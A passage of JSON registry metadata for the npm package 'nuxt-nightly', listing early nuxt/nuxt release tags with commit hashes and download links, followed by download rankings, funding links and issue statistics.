0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:51:43.754Z","dependent_packages_count":0,"downloads":12493,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":29.19630090595965,"dependent_repos_count":37.49662796984681,"dependent_packages_count":53.96848874002429,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.22047253861025},"purl":"pkg:npm/nuxt-nightly","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/nuxt-nightly","docker_dependents_count":1,"docker_downloads_count":15,"usage_url":"https://repos.ecosyste.ms/usage/npm/nuxt-nightly","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/nuxt-nightly/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_a